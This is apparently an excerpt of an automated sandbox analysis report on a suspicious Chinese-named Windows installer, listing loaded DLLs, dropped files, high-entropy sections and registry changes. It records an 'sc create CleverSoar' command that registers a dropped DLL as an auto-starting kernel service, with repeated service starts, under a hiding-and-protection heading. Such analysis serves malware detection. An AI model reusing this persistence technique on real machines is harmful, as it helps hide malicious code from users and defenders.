Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic file information: File size 5707365 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2115894094.0000000003480000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2115992185.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009157D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_009157D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic PE information: real checksum: 0x0 should be: 0x57356c
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: is-596QU.tmp.6.drStatic PE information: section name: .xdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C7886EB push ecx; ret 6_2_6C7886FE
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C630F00 push ss; retn 0001h6_2_6C630F0A
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C856F10 push eax; ret 6_2_6C856F2E
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C7BB9F4 push 004AC35Ch; ret 6_2_6C7BBA0E
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C857290 push eax; ret 6_2_6C8572BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_008945F4 push 0093C35Ch; ret 10_2_0089460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0092FB10 push eax; ret 10_2_0092FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0092FE90 push eax; ret 10_2_0092FEBE
Source: update.vac.2.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeFile created: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeFile created: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\is-596QU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
